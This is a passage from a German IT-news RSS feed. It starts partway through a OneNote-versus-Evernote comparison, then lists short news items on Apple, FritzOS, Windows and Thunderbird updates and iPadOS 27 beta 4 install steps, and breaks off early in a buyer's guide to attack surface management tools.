<p class="wp-block-paragraph"><a href="https://www.microsoft.com/de-de/microsoft-365/onenote/digital-note-taking-app" title="OneNote" target="_blank" rel="noopener">OneNote</a> ist eine vollwertige Anwendung. Mit ihr können Sie einfache oder komplexe Notizen von Grund auf neu erstellen, sie in durchsuchbaren Notizbüchern organisieren und mit einer Vielzahl von Plattformen synchronisieren – zum Beispiel <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-PCs, Macs, iPads und iPhones sowie <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Geräten.</p>



<p class="wp-block-paragraph">Außerdem strotzt Microsofts Notiz-App nur so vor Werkzeugen – beispielsweise um:</p>



<ul class="wp-block-list">
<li><p>Notizen zu erstellen und zu bearbeiten,</p></li>



<li><p>zu zeichnen,</p></li>



<li><p>Audio- und Videoaufnahmen zu erstellen,</p></li>



<li><p>Bilder zu scannen oder</p></li>



<li><p>Tabellenkalkulationen einzubetten,</p></li>
</ul>



<p class="wp-block-paragraph">OneNote wird allmählich immer stärker in die <a href="https://www.computerwoche.de/article/3523691/microsoft-365-erklart.html" target="_blank">Microsoft-365-Suite</a> integriert. Für Unternehmen ist die Live-Zusammenarbeit besonders wichtig und sie funktioniert hier ebenso so wie in anderen Microsoft-365-Anwendungen. Besonders gut lässt sich OneNote dabei in <a title="Microsoft Teams" href="https://www.computerwoche.de/article/2795511/microsoft-teams-optimal-nutzen.html" target="_blank">Microsoft Teams</a> integrieren: Notizbücher lassen sich Teams hinzufügen – jeder innerhalb des Kanals kann diese anschließend anzeigen und bearbeiten (entsprechende Zugriffsrechte vorausgesetzt).</p>



<p class="wp-block-paragraph"><strong>Web-Clipping</strong></p>



<p class="wp-block-paragraph">So gut OneNote auch sein mag, wenn es darum geht Notizen zu erstellen: Es bleibt hinter den beträchtlichen Möglichkeiten von Evernote zurück, wenn es um das Clipping von Webinhalten geht. Dazu bietet OneNote ein Browser-Addon (Microsoft Edge, <a href="https://www.computerwoche.de/article/2805495/so-arbeiten-sie-besser-mit-google-chrome.html" title="Google Chrome" target="_blank">Google Chrome</a> und Mozilla Firefox) namens OneNote Web Clipper. Mit diesem Tool können Sie Screenshots in OneNote speichern – wenn es denn so funktioniert wie es soll.</p>



<p class="wp-block-paragraph"><strong>Versionsunterschiede</strong></p>



<p class="wp-block-paragraph">Die <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Version von OneNote kann mit der vollen Bandbreite an Tools glänzen. Im Vergleich bietet Evernote nicht annähernd so viele ausgefeilte Tools. Die Versionen für Web, <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>, iPadOS und macOS fallen hingegen ab. Sie sehen zwar ähnlich aus wie die <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-App, bieten im Vergleich aber weniger und teilweise eingeschränkte Funktionen. So können Sie hier etwa keine Tabellenkalkulationen integrieren oder Videoinhalte aufzeichnen. Die <a href="https://apps.apple.com/de/app/microsoft-onenote/id410395246" title="iOS-Version" target="_blank" rel="noopener">iOS-Version</a> hebt sich hingegen mit einer schlanken Benutzeroberfläche ab, die darauf optimiert ist, schnell Notizen zu erstellen oder zu bearbeiten. </p>



<p class="wp-block-paragraph"><strong>KI-Funktionen</strong></p>



<p class="wp-block-paragraph">Seit Mitte Januar 2024 bietet Microsoft mit <a title="Copilot Pro" href="https://www.computerwoche.de/article/2831382/microsoft-oeffnet-copilot-fuer-alle-office-nutzer.html" target="_blank">Copilot Pro</a> KI-Integration im Abomodell an – auch für OneNote.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">🧠 Work smarter with Copilot Notebooks in OneNote — your new AI-powered space to think, organize, and create. Bring all your content together and let Copilot help you get to insights, faster. <br><br>Learn more: <a href="https://t.co/c63JbghHcH">https://t.co/c63JbghHcH</a></p>— Microsoft OneNote (@msonenote) <a href="https://x.com/msonenote/status/1940802718257357260?ref_src=twsrc%5Etfw">July 3, 2025</a></blockquote>
</div></figure>



<p class="wp-block-paragraph"><strong>Storage und Preise</strong></p>



<p class="wp-block-paragraph">OneNote synchronisiert seine Inhalte mit all Ihren Geräten und mit dem Internet über Microsoft OneDrive oder SharePoint. OneNote ist in <a href="https://www.computerwoche.de/article/3523691/microsoft-365-erklart.html" target="_blank">Microsoft 365</a> enthalten. Ohne M365-Abo erhalten Sie bis zu 5 GB Cloud-Speicherplatz. Zusätzlichen Speicherplatz können Sie zukaufen. Wenn Sie (oder Ihr Unternehmen) ein Microsoft-365-Abonnement abschließen, erhalten Sie wesentlich mehr Speicherplatz: zwischen 100 GB und 6 TB – je nachdem, für <a title="welchen Plan" href="https://www.microsoft.com/de-de/microsoft-365/buy/compare-all-microsoft-365-products" target="_blank" rel="noopener">welchen Plan</a> Sie sich entscheiden.</p>



<h2 class="wp-block-heading">Evernote: Web-Clipping-King</h2>



<p class="wp-block-paragraph"><a href="https://evernote.com/intl/de" title="Evernote" target="_blank" rel="noopener">Evernote</a> ist ein ganz anderes Kaliber als OneNote. Es bietet zwar die gleichen Grundfunktionalitäten: die Möglichkeit, Notizen zu erstellen, zu organisieren und mit mehreren Plattformen (<a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, macOS, iPadOS, iOS, <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>, Web) zu synchronisieren. Dabei bietet die App im Vergleich zu OneNote allerdings eine signifikant farbenfrohere und einladendere Benutzeroberfläche – und eignet sich hervorragend, um Web-Content auszuschneiden und abzuspeichern.</p>



<p class="wp-block-paragraph">Der Startbildschirm von Evernote bietet diverse Widgets für den schnellen Zugriff auf Notizen, Notizbücher, kürzlich aufgenommene Bilder und vieles mehr. Ein zusätzliches Suchfeld garantiert zudem, dass Sie immer finden wonach Sie suchen. Die Widgets auf Ihrem Startbildschirm können Sie ganz nach Ihren Wünschen hinzufügen oder entfernen.</p>



<p class="wp-block-paragraph">Evernote bietet allerdings nicht annähernd so viele Werkzeuge zur Erstellung von Notizen wie OneNote. Zu den verfügbaren Features gehören zum Beispiel:</p>



<ul class="wp-block-list">
<li><p>Texte erstellen, bearbeiten und formatieren,</p></li>



<li><p>Tabellen, Dateien und Bilder einbetten,</p></li>



<li><p>Unterstützung für Touch-Devices und -Stifte,</p></li>



<li><p>Integrierbare Audio- und Videoaufnahmen und</p></li>



<li><p>Integration mit Google Calendar (für Outlook geplant) und Google Drive;</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Web Clipping</strong></p>



<p class="wp-block-paragraph">Die Stärke von Evernote liegt wie eingangs bereits erwähnt darin, Inhalte aus dem weltweiten Netz zu erfassen und zu organisieren. Das dazu integrierte Web-Clipping-Tool funktioniert beispielhaft und läuft als Browser-Addon (für Chrome, Firefox, Internet Explorer, Microsoft Edge, Safari und Opera). Die Funktionen variieren dabei je nach Browser leicht. Im Allgemeinen bieten Google Chrome und Microsoft Edge dabei das zuverlässigste Erlebnis.</p>



<p class="wp-block-paragraph">Die Inhalte, die Sie mit Evernote aus dem Netz ziehen, lassen sich auch mit Tags versehen und zu Notizen hinzufügen. Darüber hinaus verfügt der Clipper auch über nützliche Markierungswerkzeuge für Screenshots. Erstellte Notizen dürfen selbstverständlich auf Knopfdruck mit spezifischen Kollegen oder auch über soziale Medien geteilt werden.</p>



<p class="wp-block-paragraph"><strong>Versionsunterschiede</strong></p>



<p class="wp-block-paragraph">Die <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a>-, Mac-, iPadOS-, iOS-, <a class="idgGlossaryLink" href="https://www.computerwoche.de/mobile/" target="_blank">Android</a>– und Web-Versionen von Evernote weisen alle ein ähnliches Erscheinungsbild auf und verfügen über die gleichen Widgets und dasselbe Layout.</p>



<p class="wp-block-paragraph"><strong>KI-Funktionen</strong></p>



<p class="wp-block-paragraph">Auch Evernote integriert inzwischen künstliche Intelligenz. Zum Beispiel in Form von <a href="https://evernote.com/de-de/blog/ai-transcribe-audio-recordings-to-text" target="_blank" rel="noreferrer noopener">KI-Transkriptionen</a>, semantischen Suchen und auch in Form eines Assistenten:</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">You’ve heard about Evernote v11, now see it in action. ⚡📹<br><br>Watch Product Lead <a href="https://x.com/fedesimio?ref_src=twsrc%5Etfw">@fedesimio</a> demo the new AI Assistant, Semantic Search, and AI Meeting Notes, and share the story of how Evernote got to v11.<br><br>We’re excited to start this new chapter together. V11 is available for… <a href="https://t.co/9d8DMmRVLF">pic.twitter.com/9d8DMmRVLF</a></p>— Evernote (@evernote) <a href="https://x.com/evernote/status/2016198369727717768?ref_src=twsrc%5Etfw">January 27, 2026</a></blockquote>
</div></figure>



<p class="wp-block-paragraph"><strong>Storage und Preisgefüge</strong></p>



<p class="wp-block-paragraph">Die Basisversion von Evernote ist kostenlos, jedoch auf 60 MB neue Notizen pro Monat sowie die Synchronisierung zwischen zwei Geräten limitiert – und enthält keine erweiterten Funktionen.</p>



<p class="wp-block-paragraph"><a title="Personal- und Professional-Abos" href="https://evernote.com/intl/de/compare-plans" target="_blank" rel="noopener">Abonnement-Pläne</a> erschließen weitere Features, beispielsweise die Möglichkeit, Notizen in Präsentationen umzuwandeln, PDFs und Anhänge zu durchsuchen und die Integration mit weiteren Services wie Slack und Microsoft Teams.</p>



<ul class="wp-block-list">
<li><p>Das Starter-Abo richtet sich dabei an Einzel- beziehungsweise Privatpersonen und kostet 6,65 Euro pro Monat (oder 79,90 Euro pro Jahr).</p></li>



<li><p>Das Advanced-Abo ist auf Power User ausgelegt und kostet 16,66 Euro pro Monat (oder 199,99 Euro jährlich).</p></li>



<li><p>Enterprise-Pläne werden hingegen individuell auf das jeweilige Unternehmen zugeschnitten und bieten unter anderem gemeinsame Arbeitsbereiche, dedizierten Support und zentrale Management-Tools.</p></li>
</ul>



<h2 class="wp-block-heading">OneNote oder Evernote?</h2>



<p class="wp-block-paragraph">Wenn Sie in erster Linie ein Tool suchen, mit dem Sie auf einfache Weise Inhalte aus dem Internet erfassen, organisieren und finden können, sollten Sie zu <strong>Evernote</strong> greifen. Wollen Sie einfach nur Notizen erstellen und diese bestmöglich organisieren – oder nutzen bereits Microsoft 365 – dann dürften Sie mit <strong>OneNote</strong> glücklich werden. Oder Sie verwenden beide Apps einfach in Kombination. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.computerworld.com/article/1508044/onenote-vs-evernote-note-taking-apps.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hide My Email: Apple behebt kritische Schwachstelle nach 12 Monaten - Ad-hoc-news.de]]></title>
<description><![CDATA[Ein abstraktes Symbol für digitale Privatsphäre und Cybersicherheit auf einem modernen Smartphone-Display. Illustration mit AI erstellt ...]]></description>
<link>https://tsecurity.de/de/3685031/it-security-nachrichten/hide-my-email-apple-behebt-kritische-schwachstelle-nach-12-monaten-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685031/it-security-nachrichten/hide-my-email-apple-behebt-kritische-schwachstelle-nach-12-monaten-ad-hoc-newsde/</guid>
<pubDate>Wed, 22 Jul 2026 01:53:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein abstraktes Symbol für digitale Privatsphäre und <b>Cybersicherheit</b> auf einem modernen Smartphone-Display. Illustration mit AI erstellt ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Upgrade: Geräte-Leasing soll iPhone & Co in Speicherkrise bezahlbar machen]]></title>
<description><![CDATA[Apple will in Zeiten der Speicherkrise mit einem neuen "Leasing-Programm" dafür sorgen, dass sich mehr Kunden dauerhaft an das Unternehmen binden und dabei in der Lage sind, die steigenden Kosten für iPhone, iPad & Mac zu tragen. Abhilfe soll eine Kooperation mit Klarna schaffen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3684595/it-security-nachrichten/apple-upgrade-geraete-leasing-soll-iphone-co-in-speicherkrise-bezahlbar-machen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684595/it-security-nachrichten/apple-upgrade-geraete-leasing-soll-iphone-co-in-speicherkrise-bezahlbar-machen/</guid>
<pubDate>Tue, 21 Jul 2026 20:11:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160124.html"><img hspace="5" border="0" align="left" alt="Iphone, iOS, Ipad, Macbook, Macos, iPadOS, Safari, Apple-Ökosystem, MDM, Multi-Device, Unternehmensportal, Geräteverwaltung, Apple Business Manager, business.apple.com, Apple Maps for Business" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/89837.jpg"></a>
			Apple will in Zeiten der Speicherkrise mit einem neuen "Leasing-Programm" dafür sorgen, dass sich mehr Kunden dauerhaft an das Unternehmen binden und dabei in der Lage sind, die steigenden Kosten für iPhone, <a href="https://winfuture.de/special/ipad/" title="iPad Special">iPad</a> &amp; Mac zu tragen. Abhilfe soll eine Kooperation mit Klarna schaffen.			(<a href="https://winfuture.de/news,160124.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[FritzOS 8.26: Neues Update für die FritzBox behebt DSL-Fehler]]></title>
<description><![CDATA[Nutzer des Einstiegsrouters FritzBox 7510 können ihr System aktualisieren. Ein neues Wartungsupdate behebt einen Fehler, der die Internetgeschwindigkeit an manchen Anschlüssen drosselte. Das Betriebssystem bringt zudem wichtige Verbesserungen mit.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3684383/it-security-nachrichten/fritzos-826-neues-update-fuer-die-fritzbox-behebt-dsl-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684383/it-security-nachrichten/fritzos-826-neues-update-fuer-die-fritzbox-behebt-dsl-fehler/</guid>
<pubDate>Tue, 21 Jul 2026 18:40:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160120.html"><img hspace="5" border="0" align="left" alt="Avm, Fritzbox, FritzOS, Fritz!box, Fritz!OS, Fritz!" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/44998.jpg"></a>
			Nutzer des Einstiegsrouters <a href="https://winfuture.de/special/fritzbox/" title="FritzBox Special">FritzBox</a> 7510 können ihr System aktualisieren. Ein neues Wartungsupdate behebt einen Fehler, der die Internetgeschwindigkeit an manchen Anschlüssen drosselte. Das Betriebssystem bringt zudem wichtige Verbesserungen mit.			(<a href="https://winfuture.de/news,160120.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[FRITZ!OS 8.26 für die FRITZ!Box 7510 steht bereit]]></title>
<description><![CDATA[FRITZ! hat ein neues Wartungsupdate für die FRITZ!Box 7510 veröffentlicht. Ab sofort steht das Update auf FRITZ!OS 8.26 zum Download bereit. Die Aktualisierung ist zwar klein, behebt dafür aber ein äußerst ärgerliches Problem im Alltag. In bestimmten technischen Konstellationen konnte...Zum Beitr...]]></description>
<link>https://tsecurity.de/de/3684296/it-nachrichten/fritzos-826-fuer-die-fritzbox-7510-steht-bereit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684296/it-nachrichten/fritzos-826-fuer-die-fritzbox-7510-steht-bereit/</guid>
<pubDate>Tue, 21 Jul 2026 18:05:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FRITZ! hat ein neues Wartungsupdate für die FRITZ!Box 7510 veröffentlicht. Ab sofort steht das Update auf FRITZ!OS 8.26 zum Download bereit. Die Aktualisierung ist zwar klein, behebt dafür aber ein äußerst ärgerliches Problem im Alltag. In bestimmten technischen Konstellationen konnte...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/fritzos-8-26-fuer-die-fritzbox-7510-steht-bereit/">FRITZ!OS 8.26 für die FRITZ!Box 7510 steht bereit</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows-Update KB5121767: Microsoft behebt Dell-Hardware-Probleme - Börse Express]]></title>
<description><![CDATA[Gleichzeitig kämpft Microsoft mit Synchronisationsproblemen beim Windows Server Update Services (WSUS). Seit dem 13. Juli 2026 kommt es zu ...]]></description>
<link>https://tsecurity.de/de/3684282/windows-server/windows-update-kb5121767-microsoft-behebt-dell-hardware-probleme-boerse-express/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684282/windows-server/windows-update-kb5121767-microsoft-behebt-dell-hardware-probleme-boerse-express/</guid>
<pubDate>Tue, 21 Jul 2026 18:03:21 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gleichzeitig kämpft Microsoft mit Synchronisationsproblemen beim <b>Windows Server</b> Update Services (WSUS). Seit dem 13. Juli 2026 kommt es zu ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows-Patch KB5121767: Microsoft behebt Dell-Überhitzungskrise - Ad-hoc-news.de]]></title>
<description><![CDATA[Seit dem 13. Juli melden Administratoren verlängerte Synchronisationszeiten und gelegentliche Timeouts beim Windows Server Update Services (WSUS).]]></description>
<link>https://tsecurity.de/de/3684275/windows-server/windows-patch-kb5121767-microsoft-behebt-dell-ueberhitzungskrise-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684275/windows-server/windows-patch-kb5121767-microsoft-behebt-dell-ueberhitzungskrise-ad-hoc-newsde/</guid>
<pubDate>Tue, 21 Jul 2026 18:03:16 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seit dem 13. Juli melden Administratoren verlängerte Synchronisationszeiten und gelegentliche Timeouts beim <b>Windows Server</b> Update Services (WSUS).]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird für Android: Version 21.0 bringt modernisierte Menüs und wichtige Bugfixes]]></title>
<description><![CDATA[Das Entwicklerteam hinter Thunderbird für Android hat Version 21.0 freigegeben. Das Update für den mobilen E-Mail-Client konzentriert sich neben optischen Anpassungen vor allem auf die Stabilität und behebt diverse Fehler, die im Alltag für Frust sorgen konnten. Bei den Einstellungen...Zum Beitra...]]></description>
<link>https://tsecurity.de/de/3683869/it-nachrichten/thunderbird-fuer-android-version-210-bringt-modernisierte-menues-und-wichtige-bugfixes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683869/it-nachrichten/thunderbird-fuer-android-version-210-bringt-modernisierte-menues-und-wichtige-bugfixes/</guid>
<pubDate>Tue, 21 Jul 2026 15:34:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Entwicklerteam hinter Thunderbird für Android hat Version 21.0 freigegeben. Das Update für den mobilen E-Mail-Client konzentriert sich neben optischen Anpassungen vor allem auf die Stabilität und behebt diverse Fehler, die im Alltag für Frust sorgen konnten. Bei den Einstellungen...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-fuer-android-version-21-0-bringt-modernisierte-menues-und-wichtige-bugfixes/">Thunderbird für Android: Version 21.0 bringt modernisierte Menüs und wichtige Bugfixes</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wichtiges Windows-11-Update hilft bei plötzlich langsamen PC]]></title>
<description><![CDATA[Microsoft hat kurzfristig eine Korrektur für das Betriebssystem Windows 11 herausgegeben. Das Ergänzungs-Paket mit der Kennung KB5121767 behebt Tempoverluste und ungewöhnliches Verhalten des Computers, die nach den letzten Aktualisierungen im Juli aufgetreten sind. Ursache...]]></description>
<link>https://tsecurity.de/de/3683251/it-nachrichten/wichtiges-windows-11-update-hilft-bei-ploetzlich-langsamen-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683251/it-nachrichten/wichtiges-windows-11-update-hilft-bei-ploetzlich-langsamen-pc/</guid>
<pubDate>Tue, 21 Jul 2026 11:49:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft hat kurzfristig eine Korrektur für das Betriebssystem Windows 11 herausgegeben. Das Ergänzungs-Paket mit der Kennung KB5121767 behebt Tempoverluste und ungewöhnliches Verhalten des Computers, die nach den letzten Aktualisierungen im Juli aufgetreten sind. Ursache...]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases iPadOS 27 Beta 4: What’s New and How to Install]]></title>
<description><![CDATA[Apple has released iPadOS 27 beta 4 for registered developers, continuing its testing ahead of the public launch expected later this year. The update carries build number 24A5390f and arrives around two weeks after the previous developer beta.



The latest beta mainly focuses on fixing bugs, imp...]]></description>
<link>https://tsecurity.de/de/3682865/ios-mac-os/apple-releases-ipados-27-beta-4-whats-new-and-how-to-install/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682865/ios-mac-os/apple-releases-ipados-27-beta-4-whats-new-and-how-to-install/</guid>
<pubDate>Tue, 21 Jul 2026 08:55:26 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released iPadOS 27 beta 4 for registered developers, continuing its testing ahead of the public launch expected later this year. The update carries build number 24A5390f and arrives around two weeks after the previous developer beta.



The latest beta mainly focuses on fixing bugs, improving system stability, and refining features introduced in earlier iPadOS 27 builds. Apple has not announced any major iPad-specific additions in beta 4 so far.



Since this remains pre-release software, users should expect occasional app crashes, battery drain, performance problems, or other unexpected issues. Back up your iPad before installing the update.



How to Update to iPadOS 27 Beta 4



Follow these steps if your Apple Account is registered for developer beta updates:




Open the Settings app on your iPad.



Tap General.



Select Software Update.



Tap Beta Updates.



Choose iPadOS 27 Developer Beta.



Return to the Software Update page.



Tap Update Now when iPadOS 27 beta 4 appears.



Enter your passcode and accept the terms when requested.




Keep your iPad connected to Wi-Fi and make sure it has enough battery power. Connecting it to a charger during installation is recommended.



Users who are already running an earlier iPadOS 27 developer beta can install beta 4 directly from the Software Update section.



Everything New in iPadOS 27 Beta 4



No major iPad-only features have been discovered in iPadOS 27 beta 4 at the time of writing. Most changes appear to be shared system improvements and fixes also included with iOS 27 beta 4.




Improved system stability: The update includes additional fixes designed to reduce freezing, unexpected restarts, and crashes while the device is sitting idle.



Siri improvements: Apple continues to fix problems affecting Siri and its newer artificial intelligence features introduced with iPadOS 27.



Messages fixes: Beta 4 includes changes intended to improve reliability inside the Messages app.



Photos improvements: Apple has addressed problems affecting Photos, although no major new editing tools or interface changes have appeared in this beta.



Safari fixes: The update includes further stability improvements for Safari and its newer browsing features.



AirPods controls: Updated AirPods controls have started appearing in Control Center, along with additional options for Adaptive Audio on supported models.



Connectivity settings: The update introduces more control over connectivity assistance for individual Wi-Fi networks on supported devices.



General performance improvements: Users can expect smaller interface refinements, smoother animations, and fixes for problems reported during earlier beta testing.




Some changes can depend on the iPad model, region, language, and Apple Intelligence support. More features may also appear after testers spend additional time using the update.



Should You Install iPadOS 27 Beta 4?



iPadOS 27 beta 4 is suitable for developers and experienced users who want to test upcoming features before the official release. However, installing it on your main iPad can affect important apps, battery life, accessories, and daily performance.



Users who want a more stable experience should stay on the public beta or wait for the finished iPadOS 27 update later this year.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Attack Surface Management – ein Kaufratgeber]]></title>
<description><![CDATA[Mit diesen Attack Surface Management Tools sorgen Sie im Idealfall dafür, dass sich Angreifer gar nicht erst verbeißen.Sergey Zaykov | shutterstock.com



Regelmäßige Netzwerk-Scans reichen für eine gehärtete Angriffsfläche nicht mehr aus. Um die Sicherheit von Unternehmensressourcen und Kundenda...]]></description>
<link>https://tsecurity.de/de/3682636/it-security-nachrichten/attack-surface-management-ein-kaufratgeber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682636/it-security-nachrichten/attack-surface-management-ein-kaufratgeber/</guid>
<pubDate>Tue, 21 Jul 2026 06:24:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/10/Sergey-Zaykov-shutterstock_1617411478_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Cat Bite 16z9" class="wp-image-4082002" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit diesen Attack Surface Management Tools sorgen Sie im Idealfall dafür, dass sich Angreifer gar nicht erst verbeißen.</figcaption></figure><p class="imageCredit">Sergey Zaykov | shutterstock.com</p></div>



<p class="wp-block-paragraph">Regelmäßige Netzwerk-Scans reichen für eine gehärtete Angriffsfläche nicht mehr aus. Um die Sicherheit von Unternehmensressourcen und Kundendaten zu gewährleisten, ist eine kontinuierliche Überwachung auf neue Ressourcen und Konfigurationsabweichungen erforderlich. Werkzeuge aus den Bereichen <strong>Cyber Asset Attack Surface Management (CAASM)</strong> sowie <strong>External Attack Surface Management (EASM)</strong> sind darauf ausgelegt, die Angriffsfläche von Unternehmen:</p>



<ul class="wp-block-list">
<li><p> zu quantifizieren,</p></li>



<li><p> zu minimieren, und</p></li>



<li><p> zu härten.</p></li>
</ul>



<p class="wp-block-paragraph">Das Ziel besteht dabei darin, den Angreifern <a title="möglichst wenig Informationen" href="https://www.computerwoche.de/article/2795282/wie-viel-wissen-hacker-ueber-sie.html" target="_blank">möglichst wenig Informationen</a> über das Security-Niveau des Unternehmens zu geben und gleichzeitig kritische Business Services aufrechtzuerhalten. Dabei spielt inzwischen auch Agentic AI eine immer größere Rolle. </p>



<h2 class="wp-block-heading">12 Attack-Surface-Management-Tools</h2>



<p class="wp-block-paragraph">Die folgenden zwölf Lösungen unterstützen Sie dabei, Risiken zu identifizieren und zu managen.</p>



<p class="wp-block-paragraph"><a href="https://www.axonius.com/platform" target="_blank" rel="noreferrer noopener"><strong>Axonius Cyber Asset Attack Surface Management</strong></a></p>



<p class="wp-block-paragraph">Diese CAASM-Suite von Axonius deckt alle wichtigen Aspekte ab, wenn es um Attack Surface Monitoring geht. Das Tool erstellt zunächst ein Asset-Inventar, das automatisch aktualisiert und mit Kontext aus internen Datenquellen und Ressourcen angereichert wird.</p>



<p class="wp-block-paragraph">Dabei ist es auch möglich, Monitoring-Prozesse aufzusetzen, die auf Grundlage von Richtlinien wie PCI oder HIPAA ablaufen. So lassen sich Konfigurationen oder Schwachstellen identifizieren, die diesen zuwiderlaufen und entsprechende Maßnahmen ergreifen.</p>



<p class="wp-block-paragraph"><a href="https://www.bugcrowd.com/products/attack-surface-management/" target="_blank" rel="noreferrer noopener"><strong>Bugcrowd EASM</strong></a></p>



<p class="wp-block-paragraph">Bugcrowd hat im Mai 2024 Informer.io übernommen und dessen EASM-Angebot in seine Security-Plattform integriert. Diese automatisiert die Asset Discovery über Webapplikationen, APIs und andere “public facing”-Komponenten des IT-Stacks hinweg.</p>



